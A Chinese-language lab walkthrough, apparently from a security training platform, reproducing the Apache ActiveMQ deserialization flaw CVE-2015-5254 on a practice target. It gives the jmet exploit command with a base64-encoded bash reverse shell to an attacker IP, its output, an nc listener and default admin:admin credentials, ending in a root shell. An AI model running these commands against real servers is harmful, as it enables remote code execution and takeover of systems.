CVE漏洞系列之——ActiveMQ 反序列化漏洞（CVE-2015-5254）

Apache ActiveMQ是美国阿帕奇Apache软件基金会所研发的一套开源的消息中间件它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。漏洞复现前期准备靶机环境运行后将监听61616和8161两个端口。其中61616是工作端口消息在这个端口进行传递8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面。然后下载jmet工具以及创建external文件夹:┌──(root㉿nextcyber)-[~] └─# wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar ┌──(root㉿nextcyber)-[~] └─# mkdir external ┌──(root㉿nextcyber)-[~] └─# ls external jmet-0.1.0-all.jarjava版本问题这里的java版本不能太新不然命令执行不成功。┌──(root㉿nextcyber)-[~] └─# java -version openjdk version 1.8.0_432-432 OpenJDK Runtime Environment (build 1.8.0_432-432-b06) OpenJDK 64-Bit Server VM (build 25.432-b06, mixed mode)payload准备我们使用以下bash命令需要使用bp工具把该命令进行base64编码将编码后的命令替换成反弹shell语句再利用bash -i /dev/tcp/192.168.2.6/1234 01 YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIuNi8xMjM0IDAJjE java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIuNi8xMjM0IDAJjE}|{base64,-d}|{bash,-i} -Yp ROME 192.168.2.47 61616漏洞利用发送payload然后监听端口1234。┌──(root㉿nextcyber)-[~] └─# java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIuNi8xMjM0IDAJjE}|{base64,-d}|{bash,-i} -Yp ROME 192.168.2.47 61616 INFO d.c.j.t.JMSTarget [main] Connected with ID: ID:nextcyber-38131-1732694386395-0:1 INFO d.c.j.t.JMSTarget [main] Sent gadget ROME with command: bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIuNi8xMjM0IDAJjE}|{base64,-d}|{bash,-i} INFO d.c.j.t.JMSTarget [main] Shutting down connection ID:nextcyber-38131-1732694386395-0:1 ┌──(root㉿nextcyber)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ...此时会给目标ActiveMQ添加一个名为event的队列我们可以通过访问http://192.168.2.47:8161/admin/browse.jsp?JMSDestinationevent页面访问凭证admin:admin登陆后看到这个队列中所有消息点击查看这条消息即可触发命令执行可以看到漏洞利用成功拿到root用户的反弹shell。如果你也想体验这个漏洞的复现过程欢迎登陆 NextCyber 网络安全实战演练平台一键启动靶机无需复杂环境搭建随时随地进行靶机练习有学习需求或想获取更多资料的欢迎站内私信交流